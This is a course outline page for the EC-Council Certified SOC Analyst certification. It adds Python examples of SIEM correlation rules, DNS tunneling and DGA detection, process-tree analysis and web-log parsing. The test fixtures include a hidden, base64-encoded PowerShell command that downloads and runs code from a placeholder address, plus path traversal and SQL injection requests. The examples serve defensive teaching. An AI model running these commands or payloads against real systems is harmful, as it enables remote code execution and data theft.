This course is in active development. Preview the scope below and create a free account to be notified the moment it goes live.
EC-Council CSA
The CSA (Certified SOC Analyst) certification trains SOC analysts to operate and manage security operations, deploy and tune SIEMs, analyze network traffic, monitor endpoints, and conduct threat intelligence, so that confirmed incidents are escalated rapidly and accurately.
Who Should Take This
Security professionals working in enterprise SOCs who have at least two years of monitoring or incident-response experience and want to deepen their technical expertise in SIEM management, traffic analysis, and threat intelligence in order to advance toward senior and leadership roles.
What's Covered
1. SOC Operations and Management
2. SIEM Deployment and Management
3. Network Traffic Analysis
4. Endpoint Monitoring and Analysis
5. Threat Intelligence Operations
6. Incident Escalation and Response
7. Log Analysis and Forensics
8. Compliance and Reporting
What's Included in AccelaStudy® AI
Course Outline
60 learning goals
1. SOC Operations and Management (2 topics)
SOC architecture and workflows
- Apply SOC operational workflows, including alert intake, triage, escalation procedures, shift handover, and ticket management, using standardized processes.
- Analyze SOC maturity levels to evaluate detection capabilities, response times, and operational efficiency against industry benchmarks.
- Apply SOC technology stack deployment, including SIEM, SOAR, EDR, NDR, and threat intelligence platforms, for integrated security monitoring.
- Design SOC operational procedures, including standard operating procedures, runbooks, escalation matrices, and communication protocols, for consistent operations.
SOC roles and analyst tiers
- Apply Tier I analyst procedures, including alert monitoring, initial triage, false positive identification, and escalation of complex events to Tier II.
- Apply Tier II analyst procedures, including deep-dive investigation, correlation across data sources, and incident confirmation with detailed documentation.
- Analyze SOC performance metrics, including MTTD, MTTR, false positive rates, and analyst workload, to identify operational improvement opportunities.
- Apply SOC shift management, including knowledge transfer documentation, open case handover, and cross-shift communication, for continuous coverage.
2. SIEM Deployment and Management (2 topics)
SIEM architecture and configuration
- Apply SIEM deployment, including Splunk, QRadar, Microsoft Sentinel, and ELK Stack installation, log source onboarding, and initial configuration, for enterprise environments.
- Apply log source integration for Windows event logs, Linux syslog, firewall logs, proxy logs, cloud audit trails, and application logs into SIEM platforms.
- Apply SIEM normalization, parsing, and field extraction to standardize heterogeneous log formats for consistent correlation and search.
- Analyze SIEM architecture scalability to evaluate storage requirements, ingestion rates, retention policies, and query performance for enterprise growth.
Correlation rules and alerting
- Apply SIEM correlation rule development, including threshold-based, behavioral, and chain rules, to detect multi-stage attack patterns across log sources.
- Apply alert tuning to reduce false positives, including whitelist management, threshold adjustment, and contextual enrichment, for an improved signal-to-noise ratio.
- Analyze correlation rule effectiveness by evaluating detection coverage, false positive rates, and missed detections against MITRE ATT&CK technique mapping.
- Design SIEM use case libraries mapping detection rules to specific threat scenarios, attack techniques, and compliance monitoring requirements.
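As an added illustration of the threshold, chain and tuning goals above (example code written for this outline, not course or EC-Council material), the following implements a threshold rule, a chain rule that escalates when a success follows the burst, and a whitelist applied as tuning. Windows Security event IDs 4625 (failed logon) and 4624 (successful logon) are real; the events, hosts, users, thresholds and the scanner whitelist entry are constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed, SIEM-normalized logon events (not real logs). 4625 = failed
# logon, 4624 = successful logon, as in the Windows Security log.
EVENTS = [
    {"ts": "2024-05-01T08:00:01", "event_id": 4625, "user": "jdoe", "src_ip": "10.0.5.23"},
    {"ts": "2024-05-01T08:00:04", "event_id": 4625, "user": "jdoe", "src_ip": "10.0.5.23"},
    {"ts": "2024-05-01T08:00:09", "event_id": 4625, "user": "jdoe", "src_ip": "10.0.5.23"},
    {"ts": "2024-05-01T08:00:15", "event_id": 4625, "user": "jdoe", "src_ip": "10.0.5.23"},
    {"ts": "2024-05-01T08:00:21", "event_id": 4625, "user": "jdoe", "src_ip": "10.0.5.23"},
    {"ts": "2024-05-01T08:01:02", "event_id": 4624, "user": "jdoe", "src_ip": "10.0.5.23"},
    # Hypothetical approved vulnerability scanner: same burst shape, but whitelisted.
    {"ts": "2024-05-01T08:05:00", "event_id": 4625, "user": "svc_scan", "src_ip": "10.0.9.9"},
    {"ts": "2024-05-01T08:05:01", "event_id": 4625, "user": "svc_scan", "src_ip": "10.0.9.9"},
    {"ts": "2024-05-01T08:05:02", "event_id": 4625, "user": "svc_scan", "src_ip": "10.0.9.9"},
    {"ts": "2024-05-01T08:05:03", "event_id": 4625, "user": "svc_scan", "src_ip": "10.0.9.9"},
    {"ts": "2024-05-01T08:05:04", "event_id": 4625, "user": "svc_scan", "src_ip": "10.0.9.9"},
    # Benign: two mistyped passwords forty minutes apart.
    {"ts": "2024-05-01T09:00:00", "event_id": 4625, "user": "asmith", "src_ip": "10.0.7.7"},
    {"ts": "2024-05-01T09:40:00", "event_id": 4625, "user": "asmith", "src_ip": "10.0.7.7"},
]

FAIL_THRESHOLD = 5                      # failures that trigger the threshold rule
FAIL_WINDOW = timedelta(seconds=60)     # sliding window for those failures
SUCCESS_WINDOW = timedelta(minutes=5)   # how long after the burst a success still chains
WHITELIST = {"10.0.9.9"}                # tuning: sources whose failures are expected


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def brute_force_alerts(events, threshold=FAIL_THRESHOLD, window=FAIL_WINDOW, whitelist=WHITELIST):
    """Threshold rule: `threshold` or more 4625s from one source IP within `window`.

    Fires once per burst (the window is cleared after an alert) so a long
    password spray does not produce one alert per additional failure.
    """
    recent = defaultdict(list)   # src_ip -> failure timestamps still inside the window
    alerts = []
    for ev in sorted(events, key=_ts):
        if ev["event_id"] != 4625 or ev["src_ip"] in whitelist:
            continue
        now = _ts(ev)
        hits = recent[ev["src_ip"]]
        hits.append(now)
        while hits and now - hits[0] > window:
            hits.pop(0)                  # expire failures older than the window
        if len(hits) >= threshold:
            alerts.append({"rule": "logon_brute_force", "severity": "medium",
                           "src_ip": ev["src_ip"], "count": len(hits), "last_fail": now})
            hits.clear()
    return alerts


def chain_alerts(events, bf_alerts, window=SUCCESS_WINDOW):
    """Chain rule: a brute-force alert followed by a 4624 from the same source.

    The sequence (many failures, then a success) is what separates a successful
    guess from noise, so it is escalated above the plain threshold rule.
    """
    successes = [ev for ev in events if ev["event_id"] == 4624]
    chained = []
    for alert in bf_alerts:
        for ev in successes:
            delta = _ts(ev) - alert["last_fail"]
            if ev["src_ip"] == alert["src_ip"] and timedelta(0) <= delta <= window:
                chained.append({"rule": "brute_force_then_success", "severity": "high",
                                "src_ip": ev["src_ip"], "user": ev["user"], "logon_ts": ev["ts"]})
                break
    return chained


def run_rules(events, whitelist=WHITELIST):
    bf = brute_force_alerts(events, whitelist=whitelist)
    return bf + chain_alerts(events, bf)


if __name__ == "__main__":
    for alert in run_rules(EVENTS):
        print(alert)
```

Running `run_rules(EVENTS)` yields one medium brute-force alert for 10.0.5.23 and one high chained alert for the successful logon that followed; passing `whitelist=set()` shows the tuning effect, since the scanner burst then fires a second brute-force alert that no success ever chains to.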
3. Network Traffic Analysis (2 topics)
Packet analysis and protocol inspection
- Apply packet capture analysis using Wireshark, tcpdump, and network TAPs to inspect TCP, IP, UDP, ICMP, and application-layer protocols for anomalous behavior.
- Apply NetFlow, sFlow, and IPFIX analysis to identify unusual traffic volumes, suspicious communication patterns, and data exfiltration indicators.
- Analyze DNS traffic to identify tunneling, domain generation algorithms, fast-flux networks, and command-and-control communication channels.
- Analyze HTTP and HTTPS traffic, including TLS anomalies, certificate validation failures, and suspicious User-Agent strings, for web-based threat detection.
- Apply SIEM use case development to create detection rules for brute-force attacks, lateral movement, data exfiltration, and privilege escalation patterns.
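The DNS goal above (tunneling and DGA detection) worked through as an added example, not course code: two detectors over a constructed resolver log in the form `timestamp client qtype qname rcode`. Tunnel traffic is recognised by long, high-entropy leftmost labels under one registered domain; DGA activity by one client failing to resolve many distinct random-looking domains. Domains, clients and the pseudo-random labels are made up, and the registered-domain split is a two-label simplification.

```python
import math
from collections import Counter, defaultdict

# Constructed DNS resolver log: "<timestamp> <client> <qtype> <qname> <rcode>".
# Domains, clients and the pseudo-random labels below are made up for the example.
TUNNEL_CHUNK = "k3f9q2z7x1m8c4v6b5n0j2h7g4d1s9a3"            # stands in for encoded tunnel data
TUNNEL_LABELS = [TUNNEL_CHUNK[i:] + TUNNEL_CHUNK[:i] for i in range(0, 30, 5)]  # six distinct labels
DGA_SLDS = ["qxv7mzk3pl", "w9rtb2hfjd", "zk4mpqv8xn", "hj6tycw3bq", "ns8kqzr2vm", "dp3wxjl7tc"]

DNS_LOG = "\n".join(
    ["2024-05-01T10:00:00 10.0.1.5 A www.example.com NOERROR",
     "2024-05-01T10:00:01 10.0.1.5 A mail.example.com NOERROR",
     "2024-05-01T10:00:02 10.0.1.5 AAAA cdn.example.com NOERROR"]
    + [f"2024-05-01T10:01:{i:02d} 10.0.1.7 TXT {label}.t.badtunnel.net NOERROR"
       for i, label in enumerate(TUNNEL_LABELS)]
    + [f"2024-05-01T10:02:{i:02d} 10.0.1.9 A {sld}.com NXDOMAIN"
       for i, sld in enumerate(DGA_SLDS)]
    + ["2024-05-01T10:02:30 10.0.1.9 A intranet.example.com NOERROR"]
)


def shannon_entropy(s):
    """Bits per character; random-looking labels score high, dictionary words low."""
    if not s:
        return 0.0
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def registered_domain(qname):
    # Simplification: last two labels. Real tooling should use the Public Suffix List
    # so that, for example, "example.co.uk" is not split as "co.uk".
    return ".".join(qname.rstrip(".").split(".")[-2:])


def parse_dns_log(text):
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, qtype, qname, rcode = line.split()
        records.append({"ts": ts, "client": client, "qtype": qtype,
                        "qname": qname.lower(), "rcode": rcode})
    return records


def tunnel_suspects(records, min_queries=5, min_label_len=20, min_entropy=3.5, min_ratio=0.8):
    """Flag registered domains whose queries are mostly long, high-entropy subdomains.

    A tunnel encodes data in the leftmost label(s). CDNs and some security products
    also use hashed hostnames, so the ratio and TXT/NULL count are returned for tuning.
    """
    stats = defaultdict(lambda: {"queries": 0, "encoded": 0, "txt_null": 0, "unique_sub": set()})
    for r in records:
        domain = registered_domain(r["qname"])
        sub = r["qname"][: -len(domain) - 1] if r["qname"] != domain else ""
        st = stats[domain]
        st["queries"] += 1
        st["unique_sub"].add(sub)
        first = sub.split(".")[0]
        if len(first) >= min_label_len and shannon_entropy(first) >= min_entropy:
            st["encoded"] += 1
        if r["qtype"] in ("TXT", "NULL"):
            st["txt_null"] += 1
    return {d: {"queries": st["queries"], "encoded_ratio": st["encoded"] / st["queries"],
                "txt_null": st["txt_null"], "unique_subdomains": len(st["unique_sub"])}
            for d, st in stats.items()
            if st["queries"] >= min_queries and st["encoded"] / st["queries"] >= min_ratio}


def dga_suspects(records, min_nxdomain=5, min_entropy=3.0):
    """Flag clients that fail to resolve many distinct random-looking domains."""
    failed = defaultdict(set)
    for r in records:
        if r["rcode"] != "NXDOMAIN":
            continue
        domain = registered_domain(r["qname"])
        if shannon_entropy(domain.split(".")[0]) >= min_entropy:
            failed[r["client"]].add(domain)
    return {client: sorted(domains) for client, domains in failed.items()
            if len(domains) >= min_nxdomain}


if __name__ == "__main__":
    recs = parse_dns_log(DNS_LOG)
    print("tunnel suspects:", tunnel_suspects(recs))
    print("DGA suspects:", dga_suspects(recs))
```

On the constructed log only `badtunnel.net` (six TXT queries, each with a distinct 32-character label) and client 10.0.1.9 (six NXDOMAINs for distinct ten-character domains) are flagged; `example.com` traffic passes both detectors. In production the thresholds need baselining against the environment's own CDN and telemetry domains before they are promoted to alerting rules.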
Network behavior analysis
- Apply network baseline establishment using traffic profiling, port utilization, and communication pattern mapping for deviation-based anomaly detection.
- Analyze lateral movement indicators, including port scanning, credential reuse, SMB enumeration, and RDP brute-force patterns, across internal network segments.
- Apply NDR tools to detect encrypted traffic anomalies, beaconing behavior, and covert channel communication without requiring payload decryption.
- Apply deep packet inspection to identify protocol anomalies, malformed headers, and tunneled traffic used for data exfiltration and C2 communication.
4. Endpoint Monitoring and Analysis (2 topics)
Endpoint detection and response
- Apply EDR telemetry analysis, including process trees, file system events, registry modifications, and network connections, to identify malicious endpoint activity.
- Apply Windows event log analysis, including Security, authentication, Sysmon, and PowerShell logs, to detect credential attacks, process injection, and persistence.
- Apply Linux audit log analysis, including syslog, auth.log, and auditd, to detect privilege escalation, unauthorized access, and suspicious process execution.
- Analyze endpoint IOCs, including suspicious process hierarchies, unusual DLL loads, scheduled task creation, and service installations, to confirm compromises.
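The process-tree and PowerShell-log goals above, as an added example that is not course material: a small analyzer over constructed process-creation events modelled on Sysmon Event ID 1 (the real Sysmon process-creation event; PIDs stand in for its GUIDs). It rebuilds the parent chain, flags a script host descended from an Office application, and decodes `-EncodedCommand` (base64 of UTF-16LE, as PowerShell defines it) so the analyst sees the real command. The host, user, PIDs, payload and the 203.0.113.10 (TEST-NET-3) URL are made up.

```python
import base64
import re

# Constructed payload and events modelled on Sysmon Event ID 1 (process creation).
# Host, user, PIDs and the download URL (a TEST-NET-3 address) are made up.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()   # what -enc actually carries

EVENTS = [
    {"pid": 1000, "ppid": 1, "image": "C:\\Windows\\explorer.exe",
     "cmdline": "explorer.exe", "user": "CORP\\jdoe"},
    {"pid": 2200, "ppid": 1000, "image": "C:\\Program Files\\Microsoft Office\\WINWORD.EXE",
     "cmdline": '"WINWORD.EXE" /n "invoice.docm"', "user": "CORP\\jdoe"},
    {"pid": 2300, "ppid": 2200, "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /c powershell -nop -w hidden -enc " + ENCODED, "user": "CORP\\jdoe"},
    {"pid": 2400, "ppid": 2300, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell -nop -w hidden -enc " + ENCODED, "user": "CORP\\jdoe"},
    {"pid": 3100, "ppid": 1000, "image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "cmdline": "firefox.exe", "user": "CORP\\jdoe"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the common spellings.
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def image_name(event):
    return event["image"].rsplit("\\", 1)[-1].lower()


def build_tree(events):
    return {e["pid"]: e for e in events}


def ancestry(tree, pid):
    """Process names from `pid` up to the root, following ppid links (loop-guarded)."""
    chain, seen = [], set()
    while pid in tree and pid not in seen:
        seen.add(pid)
        chain.append(image_name(tree[pid]))
        pid = tree[pid]["ppid"]
    return chain


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none or it is malformed."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def find_suspicious(events):
    """Apply two process-tree rules; findings carry the full ancestry for triage."""
    tree = build_tree(events)
    findings = []
    for e in events:
        name = image_name(e)
        chain = ancestry(tree, e["pid"])
        # Rule 1: a script host anywhere below an Office application (macro -> shell).
        if name in SCRIPT_HOSTS and any(a in OFFICE_APPS for a in chain[1:]):
            findings.append({"pid": e["pid"], "rule": "office_spawns_script_host", "chain": chain})
        # Rule 2: encoded PowerShell; decode so the analyst sees the real command.
        decoded = decode_encoded_command(e["cmdline"]) if name in ("powershell.exe", "pwsh.exe") else None
        if decoded is not None:
            findings.append({"pid": e["pid"], "rule": "encoded_powershell",
                             "decoded": decoded, "chain": chain})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious(EVENTS):
        print(finding)
```

Both rules fire on the constructed tree (cmd.exe and powershell.exe under WINWORD.EXE, plus the decoded download cradle on the PowerShell process) while the Firefox process under explorer.exe is untouched. The same ancestry walk is what lets an analyst confirm an EDR "suspicious parent" alert without re-querying the raw telemetry.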
Threat hunting on endpoints
- Apply hypothesis-driven threat hunting using MITRE ATT&CK techniques to proactively search endpoint telemetry for undetected threats.
- Apply IOC-based hunting using file hashes, IP addresses, domain names, and behavioral signatures to sweep enterprise endpoints for known threats.
- Analyze threat hunting results to identify detection gaps, update correlation rules, and improve endpoint monitoring coverage for emerging threat techniques.
5. Threat Intelligence Operations (2 topics)
Threat intelligence integration
- Apply threat intelligence platform management, including feed aggregation, IOC deduplication, confidence scoring, and integration with SIEM and EDR, for automated enrichment.
- Apply the STIX, TAXII, and OpenIOC standards to consume, share, and operationalize threat intelligence across organizational and industry boundaries.
- Analyze threat intelligence reports to extract relevant IOCs, TTPs, and actor profiles for detection rule development and proactive defense measures.
- Design threat intelligence workflows incorporating collection, processing, analysis, dissemination, and feedback loops for continuous intelligence improvement.
- Apply incident escalation procedures, including severity classification, stakeholder notification, SLA management, and cross-team coordination workflows.
Threat landscape analysis
- Apply MITRE ATT&CK framework mapping to classify observed adversary behaviors and identify technique coverage gaps in SOC detection capabilities.
- Analyze threat actor profiles, including nation-state APTs, cybercriminal groups, and hacktivists, to assess organizational risk exposure and targeting likelihood.
- Apply threat modeling techniques, including STRIDE and attack trees, to identify potential attack paths against organizational critical assets and infrastructure.
6. Incident Escalation and Response (2 topics)
Alert analysis and escalation
- Apply multi-source alert correlation to validate security events by cross-referencing SIEM alerts, EDR detections, and network anomalies for incident confirmation.
- Apply incident escalation procedures, including severity classification, evidence packaging, and Tier III handoff documentation, for confirmed security incidents.
- Analyze complex multi-stage attacks by correlating events across kill chain phases to reconstruct attack timelines and identify all affected assets.
- Apply initial containment recommendations, including account suspension, IP blocking, and endpoint isolation, to limit damage during incident escalation.
SOAR and automation
- Apply SOAR platform playbooks to automate repetitive SOC tasks, including IOC enrichment, ticket creation, containment actions, and notification workflows.
- Apply automated incident response workflows, including phishing analysis, endpoint isolation, threat intelligence lookups, and evidence collection, to reduce response times.
- Design SOAR automation strategies that identify high-volume repetitive tasks for automation while keeping analyst oversight at complex decision points.
7. Log Analysis and Forensics (2 topics)
Log analysis techniques
- Apply Windows Security log analysis to detect authentication failures, privilege escalation, Group Policy changes, and suspicious service installations.
- Apply web server log analysis, including Apache, IIS, and Nginx access and error logs, to identify injection attacks, directory traversal, and brute-force attempts.
- Apply email gateway log analysis to identify phishing campaigns, spam waves, and malicious attachment delivery patterns across the enterprise.
- Analyze correlated log data across multiple sources to reconstruct security incidents, determine root cause, and identify all compromised systems and data.
- Apply threat intelligence feeds, including STIX/TAXII, MISP, and commercial platforms, to enrich SIEM alerts with contextual threat data.
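The web server log goal above (injection, directory traversal, brute force), as an added example rather than course code: a parser for the Apache "combined" access-log format, signature checks run on the URL-decoded request path, and a per-source failed-login counter that also notes whether a non-401 response followed the burst. The log lines, hosts (documentation ranges), paths and thresholds are constructed; the two signature regexes cover a few common patterns and are not a complete ruleset.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed Apache "combined" access-log lines (hosts, paths and timings are made up).
ACCESS_LOG = """\
198.51.100.7 - - [01/May/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [01/May/2024:10:00:02 +0000] "GET /images/logo.png HTTP/1.1" 200 2048 "http://shop.example/" "Mozilla/5.0"
203.0.113.42 - - [01/May/2024:10:01:10 +0000] "GET /download?file=../../../../etc/passwd HTTP/1.1" 403 199 "-" "curl/8.0"
203.0.113.42 - - [01/May/2024:10:01:11 +0000] "GET /download?file=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1" 403 199 "-" "curl/8.0"
203.0.113.42 - - [01/May/2024:10:01:20 +0000] "GET /product?id=1%27%20UNION%20SELECT%20user%2Cpass%20FROM%20users-- HTTP/1.1" 500 310 "-" "sqlmap/1.7"
203.0.113.42 - - [01/May/2024:10:01:21 +0000] "GET /product?id=1'+OR+'1'='1 HTTP/1.1" 200 8800 "-" "sqlmap/1.7"
192.0.2.19 - - [01/May/2024:10:02:00 +0000] "POST /login HTTP/1.1" 401 120 "-" "python-requests/2.31"
192.0.2.19 - - [01/May/2024:10:02:01 +0000] "POST /login HTTP/1.1" 401 120 "-" "python-requests/2.31"
192.0.2.19 - - [01/May/2024:10:02:02 +0000] "POST /login HTTP/1.1" 401 120 "-" "python-requests/2.31"
192.0.2.19 - - [01/May/2024:10:02:03 +0000] "POST /login HTTP/1.1" 401 120 "-" "python-requests/2.31"
192.0.2.19 - - [01/May/2024:10:02:04 +0000] "POST /login HTTP/1.1" 401 120 "-" "python-requests/2.31"
192.0.2.19 - - [01/May/2024:10:02:05 +0000] "POST /login HTTP/1.1" 401 120 "-" "python-requests/2.31"
192.0.2.19 - - [01/May/2024:10:02:06 +0000] "POST /login HTTP/1.1" 401 120 "-" "python-requests/2.31"
192.0.2.19 - - [01/May/2024:10:02:07 +0000] "POST /login HTTP/1.1" 401 120 "-" "python-requests/2.31"
192.0.2.19 - - [01/May/2024:10:02:09 +0000] "POST /login HTTP/1.1" 302 0 "-" "python-requests/2.31"
"""

# Apache combined format: host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")
SQLI_RE = re.compile(
    r"union\s+select|'\s*(?:or|and)\s*'|--\s*$|/\*.*\*/|;\s*(?:drop|insert|update|delete)\b",
    re.IGNORECASE,
)


def parse_access_log(text):
    records = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # in production, count unparsable lines; they are a finding in themselves
        rec = m.groupdict()
        rec["status"] = int(rec["status"])
        # Decode twice so "%252e%252e%252f" style double encoding is seen as "../" too.
        rec["decoded_path"] = unquote_plus(unquote_plus(rec["path"]))
        records.append(rec)
    return records


def signature_findings(records):
    """Match traversal and SQL injection signatures against the decoded path."""
    findings = []
    for r in records:
        p = r["decoded_path"]
        if TRAVERSAL_RE.search(p):
            findings.append({"ip": r["ip"], "rule": "directory_traversal", "path": r["path"], "status": r["status"]})
        if SQLI_RE.search(p):
            findings.append({"ip": r["ip"], "rule": "sql_injection", "path": r["path"], "status": r["status"]})
    return findings


def brute_force_sources(records, login_path="/login", threshold=5):
    """Sources with >= threshold failed logins, noting whether a 200/302 followed the burst."""
    fails = Counter()
    succeeded = set()
    for r in records:
        if r["method"] != "POST" or r["path"] != login_path:
            continue
        if r["status"] == 401:
            fails[r["ip"]] += 1
        elif fails[r["ip"]] >= threshold and r["status"] in (200, 302):
            succeeded.add(r["ip"])
    return {ip: {"failures": n, "possible_success": ip in succeeded}
            for ip, n in fails.items() if n >= threshold}


if __name__ == "__main__":
    recs = parse_access_log(ACCESS_LOG)
    for f in signature_findings(recs):
        print(f)
    print(brute_force_sources(recs))
```

Decoding before matching matters: the second traversal line and the UNION SELECT line are only caught because `%2F` and `%27%20` are unescaped first. The 403 and 500 statuses on the flagged requests are part of the triage signal, since a 200 on an injection attempt is the line that deserves escalation.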
Cloud and application log analysis
- Apply cloud audit log analysis, including AWS CloudTrail, Azure Activity Log, and GCP Cloud Audit Logs, to detect unauthorized API calls and configuration changes.
- Apply database activity monitoring log analysis to detect SQL injection, unauthorized data access, and privilege abuse across enterprise database platforms.
- Analyze application log anomalies, including authentication failures, error rate spikes, and API abuse patterns, to identify application-layer attack campaigns.
8. Compliance and Reporting (1 topic)
SOC reporting and compliance monitoring
- Apply compliance monitoring using SIEM rules to detect PCI DSS, HIPAA, SOX, and GDPR control violations and generate audit-ready compliance evidence.
- Apply SOC reporting, including daily operational summaries, weekly trend analysis, monthly executive reports, and quarterly security posture assessments.
- Analyze security event trends to identify recurring attack patterns, emerging threat vectors, and detection coverage gaps requiring operational adjustments.
- Design SOC dashboard frameworks presenting real-time threat landscape, operational metrics, and compliance status for multiple stakeholder audiences.
- Design SOC metrics and KPI dashboards tracking MTTD, MTTR, alert volume, false positive rates, and analyst workload for operational improvement.
Scope
Included Topics
- All domains in EC-Council CSA, covering SOC operations, monitoring, analysis, and incident escalation for Tier I and Tier II SOC analysts.
- SOC fundamentals, including architecture, team roles, workflows, technology stack, and operational procedures for 24/7 security monitoring.
- SIEM deployment and management, including log source integration, correlation rule development, alert tuning, dashboards, and compliance reporting.
- Threat intelligence integration, including IOC management, threat feeds, STIX/TAXII, and intelligence-driven detection for proactive monitoring.
- Incident detection and analysis, including network packet analysis, endpoint telemetry review, log correlation, and alert triage.
- Log analysis techniques for Windows, Linux, web servers, email gateways, cloud platforms, and database activity monitoring.
Not Covered
- Offensive penetration testing and exploit development, covered by CEH and CPENT.
- The full incident response lifecycle, including containment, eradication, and recovery, covered by ECIH.
- Network defense architecture design and perimeter security engineering, covered by CND.
- Digital forensics evidence collection and malware reverse engineering, covered by CHFI.
- Executive security governance and CISO-level program management, covered by CCISO.
Official Exam Page
Learn more at EC-Council
Exam 312-39: course coming soon.